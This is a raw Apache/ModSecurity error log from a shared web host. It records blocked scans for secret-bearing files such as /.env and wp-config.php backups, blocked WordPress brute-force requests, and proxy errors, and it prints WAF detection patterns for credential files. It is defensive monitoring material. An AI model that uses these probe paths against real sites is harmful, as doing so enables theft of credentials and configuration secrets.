[Tue May 26 13:44:27.741663 2026] [security2:error] [pid 544395:tid 544625] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWYxmrs7g3RMCdp8XeSAAAAGQ"]
[Tue May 26 13:44:29.093509 2026] [security2:error] [pid 544395:tid 544476] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env"] [unique_id "ahVWZRmrs7g3RMCdp8XebAAAL1A"]
[Tue May 26 13:44:29.535383 2026] [security2:error] [pid 544395:tid 544617] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWZRmrs7g3RMCdp8XebgAAAFw"]
[Tue May 26 13:44:30.814519 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:42019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWZhmrs7g3RMCdp8XenwAAAFM"]
[Tue May 26 13:44:30.830141 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:42019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWZhmrs7g3RMCdp8XenwAAAFM"]
[Tue May 26 13:44:31.457015 2026] [security2:error] [pid 544395:tid 544548] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWZxmrs7g3RMCdp8XeqAAAABc"]
[Tue May 26 13:44:33.389163 2026] [security2:error] [pid 544395:tid 544552] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWaBmrs7g3RMCdp8Xe0AAAABs"]
[Tue May 26 13:44:34.399814 2026] [security2:error] [pid 544395:tid 544483] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.backup"] [unique_id "ahVWahmrs7g3RMCdp8Xe8QAAF1c"]
[Tue May 26 13:44:34.488479 2026] [security2:error] [pid 536875:tid 537060] [client 106.192.248.115:54670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWaur_-FTveSGlx1H5-QAAALw"]
[Tue May 26 13:44:34.492645 2026] [security2:error] [pid 536875:tid 537060] [client 106.192.248.115:54670] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWaur_-FTveSGlx1H5-QAAALw"]
[Tue May 26 13:44:34.737250 2026] [security2:error] [pid 544395:tid 544492] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.old"] [unique_id "ahVWahmrs7g3RMCdp8Xe-AAABmA"]
[Tue May 26 13:44:34.894031 2026] [security2:error] [pid 544395:tid 544475] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.bak"] [unique_id "ahVWahmrs7g3RMCdp8XfAwAAGk8"]
[Tue May 26 13:44:35.180743 2026] [security2:error] [pid 544395:tid 544495] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/config/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfCwAALGM"]
[Tue May 26 13:44:35.229049 2026] [security2:error] [pid 536875:tid 537115] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWaur_-FTveSGlx1H6AgAAAPM"]
[Tue May 26 13:44:35.422818 2026] [security2:error] [pid 544395:tid 544491] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/app/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfEgAAT18"]
[Tue May 26 13:44:35.579568 2026] [security2:error] [pid 544395:tid 544477] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/src/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfEwAAb1E"]
[Tue May 26 13:44:35.761174 2026] [security2:error] [pid 544395:tid 544463] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/backend/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfGAAAbUM"]
[Tue May 26 13:44:35.919782 2026] [security2:error] [pid 544395:tid 544482] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/api/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfHAAAKlY"]
[Tue May 26 13:44:36.221800 2026] [security2:error] [pid 544395:tid 544501] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/config.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfHwAAf2k"]
[Tue May 26 13:44:36.589174 2026] [security2:error] [pid 544395:tid 544505] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/settings.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfKwAAY20"]
[Tue May 26 13:44:36.875781 2026] [security2:error] [pid 544395:tid 544619] [client 185.191.171.8:38538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahVWbBmrs7g3RMCdp8XfMgAAAF4"]
[Tue May 26 13:44:36.875893 2026] [security2:error] [pid 544395:tid 544619] [client 185.191.171.8:38538] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahVWbBmrs7g3RMCdp8XfMgAAAF4"]
[Tue May 26 13:44:36.971209 2026] [security2:error] [pid 544395:tid 544396] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfNQAAVwA"]
[Tue May 26 13:44:37.327257 2026] [security2:error] [pid 544395:tid 544517] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/config.php.bak"] [unique_id "ahVWbRmrs7g3RMCdp8XfQwAAI3k"]
[Tue May 26 13:44:37.359853 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfNAAAABM"]
[Tue May 26 13:44:37.709318 2026] [security2:error] [pid 544395:tid 544514] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.backup"] [unique_id "ahVWbRmrs7g3RMCdp8XfRAAAD3Y"]
[Tue May 26 13:44:37.924735 2026] [security2:error] [pid 544395:tid 544507] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.bak"] [unique_id "ahVWbRmrs7g3RMCdp8XfSAAAIG8"]
[Tue May 26 13:44:38.090259 2026] [security2:error] [pid 544395:tid 544518] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.old"] [unique_id "ahVWbhmrs7g3RMCdp8XfTgAABXo"]
[Tue May 26 13:44:38.262007 2026] [security2:error] [pid 544395:tid 544513] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.save"] [unique_id "ahVWbhmrs7g3RMCdp8XfUgAAfHU"]
[Tue May 26 13:44:38.462433 2026] [security2:error] [pid 544395:tid 544534] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbhmrs7g3RMCdp8XfSgAAAAk"]
[Tue May 26 13:44:38.654875 2026] [security2:error] [pid 544395:tid 544512] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.swp"] [unique_id "ahVWbhmrs7g3RMCdp8XfWAAAMHQ"]
[Tue May 26 13:44:38.900918 2026] [security2:error] [pid 544395:tid 544510] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.txt"] [unique_id "ahVWbhmrs7g3RMCdp8XfWgAAG3I"]
[Tue May 26 13:44:40.056102 2026] [security2:error] [pid 544395:tid 544571] [client 14.175.100.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbxmrs7g3RMCdp8XfZAAAAC4"]
[Tue May 26 13:44:40.483898 2026] [security2:error] [pid 536875:tid 537043] [client 92.71.125.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVWb-r_-FTveSGlx1H6MAAAAKs"]
[Tue May 26 13:44:41.087169 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWcBmrs7g3RMCdp8XffwAAACw"]
[Tue May 26 13:44:41.191291 2026] [security2:error] [pid 544395:tid 544591] [client 129.222.147.134:62899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWcRmrs7g3RMCdp8XfggAAAEI"]
[Tue May 26 13:44:41.191416 2026] [security2:error] [pid 544395:tid 544591] [client 129.222.147.134:62899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWcRmrs7g3RMCdp8XfggAAAEI"]
[Tue May 26 13:44:41.259710 2026] [security2:error] [pid 536875:tid 536982] [remote 74.7.241.58:39866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVWcer_-FTveSGlx1H6RQABAGo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 13:44:41.363795 2026] [proxy:error] [pid 536875:tid 537009] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:41.363854 2026] [proxy_http:error] [pid 536875:tid 537009] [client 208.84.100.173:19796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:41.364449 2026] [proxy:error] [pid 536875:tid 537009] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:41.364483 2026] [proxy_http:error] [pid 536875:tid 537009] [client 208.84.100.173:19796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:41.479056 2026] [security2:error] [pid 536875:tid 536927] [remote 167.172.25.98:58714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVWcer_-FTveSGlx1H6RgAAqTM"]
[Tue May 26 13:44:42.232607 2026] [security2:error] [pid 536875:tid 537108] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVWcOr_-FTveSGlx1H6NQAAAOw"]
[Tue May 26 13:44:42.771403 2026] [security2:error] [pid 536875:tid 537091] [client 208.84.100.173:36322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVWcur_-FTveSGlx1H6cwAAANs"]
[Tue May 26 13:44:42.771542 2026] [security2:error] [pid 536875:tid 537095] [client 208.84.100.173:36312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVWcur_-FTveSGlx1H6dwAAAN8"]
[Tue May 26 13:44:42.772604 2026] [proxy:error] [pid 536875:tid 537026] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.772670 2026] [proxy_http:error] [pid 536875:tid 537026] [client 208.84.100.173:36350] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.773245 2026] [proxy:error] [pid 536875:tid 537026] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.773278 2026] [proxy_http:error] [pid 536875:tid 537026] [client 208.84.100.173:36350] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.773401 2026] [proxy:error] [pid 536875:tid 537119] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.773474 2026] [proxy_http:error] [pid 536875:tid 537119] [client 208.84.100.173:36342] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774047 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774124 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36366] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774356 2026] [proxy:error] [pid 536875:tid 537078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774431 2026] [proxy_http:error] [pid 536875:tid 537078] [client 208.84.100.173:36354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774539 2026] [proxy:error] [pid 536875:tid 537016] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774588 2026] [proxy_http:error] [pid 536875:tid 537016] [client 208.84.100.173:36292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774646 2026] [security2:error] [pid 536875:tid 537088] [client 208.84.100.173:36332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVWcur_-FTveSGlx1H6dgAAANg"]
[Tue May 26 13:44:42.774686 2026] [proxy:error] [pid 536875:tid 537119] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774736 2026] [proxy_http:error] [pid 536875:tid 537119] [client 208.84.100.173:36342] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774943 2026] [proxy:error] [pid 536875:tid 537109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774979 2026] [proxy_http:error] [pid 536875:tid 537109] [client 208.84.100.173:36302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775116 2026] [proxy:error] [pid 536875:tid 537036] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775186 2026] [proxy_http:error] [pid 536875:tid 537036] [client 208.84.100.173:36356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775427 2026] [proxy:error] [pid 536875:tid 537016] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775466 2026] [proxy_http:error] [pid 536875:tid 537016] [client 208.84.100.173:36292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775580 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775642 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36366] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775735 2026] [proxy:error] [pid 536875:tid 537078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775775 2026] [proxy_http:error] [pid 536875:tid 537078] [client 208.84.100.173:36354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775876 2026] [proxy:error] [pid 536875:tid 537021] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775920 2026] [proxy_http:error] [pid 536875:tid 537021] [client 208.84.100.173:36274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776113 2026] [proxy:error] [pid 536875:tid 537036] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776179 2026] [proxy_http:error] [pid 536875:tid 537036] [client 208.84.100.173:36356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776257 2026] [proxy:error] [pid 536875:tid 537109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776291 2026] [proxy_http:error] [pid 536875:tid 537109] [client 208.84.100.173:36302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776522 2026] [proxy:error] [pid 536875:tid 537021] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776556 2026] [proxy_http:error] [pid 536875:tid 537021] [client 208.84.100.173:36274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
